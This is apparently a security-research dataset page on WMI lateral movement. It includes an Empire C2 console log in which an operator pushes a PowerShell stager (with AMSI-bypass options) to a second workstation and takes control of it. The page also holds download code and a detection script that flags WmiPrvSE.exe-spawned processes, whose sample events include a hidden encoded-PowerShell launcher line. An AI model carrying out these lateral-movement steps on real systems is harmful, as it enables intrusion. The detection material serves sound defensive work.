Empire Invoke WMI

Metadata

Contributors: Roberto Rodriguez @Cyb3rWard0g
Creation Date: 2020/09/21
Modification Date: 2020/09/22
Tactics: TA0002, TA0008
Techniques: T1047
Tags: WMI IWbemServices ExecMethod

Dataset Description

This dataset represents an adversary remotely executing code via WMI. It focuses specifically on the Create method of the WMI Win32_Process class being invoked on a remote host to start a new process there.

Simulation Metadata

Tools

type    Name      Module
----    ------    ----------------
C2      Empire    lateral_movement

Adversary View

(Empire: agents) > agents

[*] Active agents:

Name     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener
----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------
A7BWPR32 ps 172.18.39.5     WORKSTATION5      *THESHIRE\pgustavo      powershell         5904   5/0.0    2020-09-18 18:29:36  http            
HBEW9G1D ps 172.18.39.6     WORKSTATION6      THESHIRE\sbeavers       powershell         6036   5/0.0    2020-09-18 18:15:39  http            
UF5MYK42 ps 172.18.39.5     WORKSTATION5      *THESHIRE\pgustavo      powershell         6404   5/0.0    2020-09-20 21:28:07  http            

AWTK7BX5 ps 172.18.39.5     WORKSTATION5      *THESHIRE\pgustavo      powershell         2228   5/0.0    2020-09-21 04:06:27  http            

(Empire: agents) > interact AWTK7BX5
(Empire: AWTK7BX5) > usemodule lateral_movement/invoke_wmi
(Empire: powershell/lateral_movement/invoke_wmi) > set Listener http
(Empire: powershell/lateral_movement/invoke_wmi) > set ComputerName WORKSTATION6.theshire.local
(Empire: powershell/lateral_movement/invoke_wmi) > info

              Name: Invoke-WMI
            Module: powershell/lateral_movement/invoke_wmi
        NeedsAdmin: False
        OpsecSafe: True
          Language: powershell
MinLanguageVersion: 2
        Background: False
  OutputExtension: None

Authors:
  @harmj0y

Description:
  Executes a stager on remote hosts using WMI.

Options:

  Name             Required    Value                     Description
  ----             --------    -------                   -----------
  Agent            True        AWTK7BX5                  Agent to run module on.                 
  CredID           False                                 CredID from the store to use.           
  ComputerName     True        WORKSTATION6.theshire.lo  Host[s] to execute the stager on, comma 
                              cal                       separated.                              
  Listener         False       http                      Listener to use.                        
  Command          False                                 Custom command to run.                  
  Obfuscate        False       False                     Switch. Obfuscate the launcher          
                                                        powershell code, uses the               
                                                        ObfuscateCommand for obfuscation types. 
                                                        For powershell only.                    
  ObfuscateCommand False       Token\All\1               The Invoke-Obfuscation command to use.  
                                                        Only used if Obfuscate switch is True.  
                                                        For powershell only.                    
  AMSIBypass       False       True                      Include mattifestation's AMSI Bypass in 
                                                        the stager code.                        
  AMSIBypass2      False       False                     Include Tal Liberman's AMSI Bypass in   
                                                        the stager code.                        
  UserName         False                                 [domain\]username to use to execute     
                                                        command.                                
  Password         False                                 Password to use to execute command.     
  UserAgent        False       default                   User-agent string to use for the staging
                                                        request (default, none, or other).      
  Proxy            False       default                   Proxy to use for request (default, none,
                                                        or other).                              
  ProxyCreds       False       default                   Proxy credentials                       
                                                        ([domain\]username:password) to use for 
                                                        request (default, none, or other).      

(Empire: powershell/lateral_movement/invoke_wmi) > execute
[*] Tasked AWTK7BX5 to run TASK_CMD_WAIT
[*] Agent AWTK7BX5 tasked with task ID 3
[*] Tasked agent AWTK7BX5 to run module powershell/lateral_movement/invoke_wmi
(Empire: powershell/lateral_movement/invoke_wmi) > 
[*] Sending POWERSHELL stager (stage 1) to 172.18.39.6
[*] New agent EHUNP61R checked in
[+] Initial agent EHUNP61R from 172.18.39.6 now active (Slack)
[*] Sending agent (stage 2) to EHUNP61R at 172.18.39.6

(Empire: powershell/lateral_movement/invoke_wmi) > agents

[*] Active agents:

Name     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener
----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------
A7BWPR32 ps 172.18.39.5     WORKSTATION5      *THESHIRE\pgustavo      powershell         5904   5/0.0    2020-09-18 18:29:36  http            
HBEW9G1D ps 172.18.39.6     WORKSTATION6      THESHIRE\sbeavers       powershell         6036   5/0.0    2020-09-18 18:15:39  http            
UF5MYK42 ps 172.18.39.5     WORKSTATION5      *THESHIRE\pgustavo      powershell         6404   5/0.0    2020-09-20 21:28:07  http            

AWTK7BX5 ps 172.18.39.5     WORKSTATION5      *THESHIRE\pgustavo      powershell         2228   5/0.0    2020-09-21 04:14:58  http            
EHUNP61R ps 172.18.39.6     WORKSTATION6      *THESHIRE\pgustavo      powershell         9804   5/0.0    2020-09-21 04:14:56  http            

(Empire: agents) > interact EHUNP61R
(Empire: EHUNP61R) > shell whoami
[*] Tasked EHUNP61R to run TASK_SHELL
[*] Agent EHUNP61R tasked with task ID 1
(Empire: EHUNP61R) > 
theshire\pgustavo

..Command execution completed.

(Empire: EHUNP61R) >

Explore Datasets

Download & Decompress Dataset

import requests
from zipfile import ZipFile
from io import BytesIO

# Zipped dataset (a single JSON-lines file) in the OTRF Security-Datasets repository
url = "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/host/empire_wmi_dcerpc_wmi_IWbemServices_ExecMethod.zip"
zipFileRequest = requests.get(url)
zipFileRequest.raise_for_status()  # stop here if the download did not succeed
zipFile = ZipFile(BytesIO(zipFileRequest.content))
# Extract the only archive member into the working directory and keep its path
datasetJSONPath = zipFile.extract(zipFile.namelist()[0])

Read JSON File

import pandas as pd

# The file is newline-delimited JSON (one event per line), hence lines=True
df = pd.read_json(path_or_buf=datasetJSONPath, lines=True)

Access Security Events

# Number of events per log channel (Security, Sysmon, ...), most populous first
df.groupby(['Channel']).size().sort_values(ascending=False)
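Once the events are loaded, the host-side signal for the technique this dataset captures is the parent/child pair: a remote Win32_Process.Create call is executed by the WMI provider host (WmiPrvSE.exe) on the target, so the new process shows up as its child in both Sysmon event 1 and Security event 4688. The following is an added example of that check, not code from the dataset page or the OTRF project. It assumes the export's Sysmon-style field names (Channel, EventID, Image, ParentImage, NewProcessName, ParentProcessName, CommandLine) and runs over constructed sample events instead of the downloaded file, so it works offline; pass it the records from `datasetJSONPath` to run it against the real dataset.

```python
import json
import ntpath
from collections import Counter

# Constructed sample events (not taken from the dataset) written in the same
# JSON-lines layout the Security-Datasets export uses: one event per line.
# The field names used here are an assumption about the dataset's schema.
SAMPLE_EVENTS = [
    # Sysmon EID 1 on the target: PowerShell spawned by the WMI provider host,
    # which is what a Win32_Process.Create call looks like on the receiving end.
    {"@timestamp": "2020-09-21T04:14:50Z", "Hostname": "WORKSTATION6.theshire.local",
     "Channel": "Microsoft-Windows-Sysmon/Operational", "EventID": 1,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "CommandLine": "powershell -NoP -W Hidden -enc <base64 placeholder>",
     "User": r"THESHIRE\pgustavo"},
    # The same process creation as recorded by Security EID 4688 (different field names)
    {"@timestamp": "2020-09-21T04:14:50Z", "Hostname": "WORKSTATION6.theshire.local",
     "Channel": "Security", "EventID": 4688,
     "NewProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentProcessName": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "SubjectUserName": "pgustavo"},
    # Benign: the WMI provider host itself being started by svchost.exe
    {"@timestamp": "2020-09-21T04:14:49Z", "Hostname": "WORKSTATION6.theshire.local",
     "Channel": "Microsoft-Windows-Sysmon/Operational", "EventID": 1,
     "Image": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding"},
    # Benign: an interactive user launching cmd.exe from Explorer
    {"@timestamp": "2020-09-21T04:10:00Z", "Hostname": "WORKSTATION6.theshire.local",
     "Channel": "Microsoft-Windows-Sysmon/Operational", "EventID": 1,
     "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "cmd.exe"},
]
SAMPLE_JSONL = "\n".join(json.dumps(e) for e in SAMPLE_EVENTS)

WMI_PROVIDER_HOST = "wmiprvse.exe"
SYSMON_CHANNEL = "Microsoft-Windows-Sysmon/Operational"


def load_jsonl(text):
    """Parse JSON-lines text into a list of event dicts, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def process_creation_fields(event):
    """Normalise the two process-creation event types to (child, parent, cmdline).

    Returns None for any event that is not a process creation."""
    channel, eid = event.get("Channel", ""), event.get("EventID")
    if channel == SYSMON_CHANNEL and eid == 1:
        return (event.get("Image", ""), event.get("ParentImage", ""),
                event.get("CommandLine", ""))
    if channel == "Security" and eid == 4688:
        return (event.get("NewProcessName", ""), event.get("ParentProcessName", ""),
                event.get("CommandLine", ""))
    return None


def find_wmi_spawned_processes(events):
    """Return process creations whose parent is the WMI provider host.

    The parent is compared by file name only (case-insensitive) so the check
    does not depend on the install path recorded by a given sensor."""
    hits = []
    for event in events:
        fields = process_creation_fields(event)
        if fields is None:
            continue
        child, parent, cmdline = fields
        if ntpath.basename(parent).lower() == WMI_PROVIDER_HOST:
            hits.append({
                "timestamp": event.get("@timestamp"),
                "host": event.get("Hostname"),
                "channel": event.get("Channel"),
                "event_id": event.get("EventID"),
                "child": ntpath.basename(child),
                "command_line": cmdline,
            })
    return hits


def count_by_channel(events):
    """Events per log channel, the same breakdown the groupby above produces."""
    return Counter(e.get("Channel", "") for e in events)


if __name__ == "__main__":
    events = load_jsonl(SAMPLE_JSONL)
    print(count_by_channel(events))
    for hit in find_wmi_spawned_processes(events):
        print(hit)
```

On the constructed input the two PowerShell creations are reported (once per channel) while WmiPrvSE.exe starting under svchost.exe and cmd.exe under Explorer are not. Against the real dataset, expect the hits to land on WORKSTATION6 around the time the new agent EHUNP61R checked in; pairing them with the Security logon events from the source host is the natural next pivot.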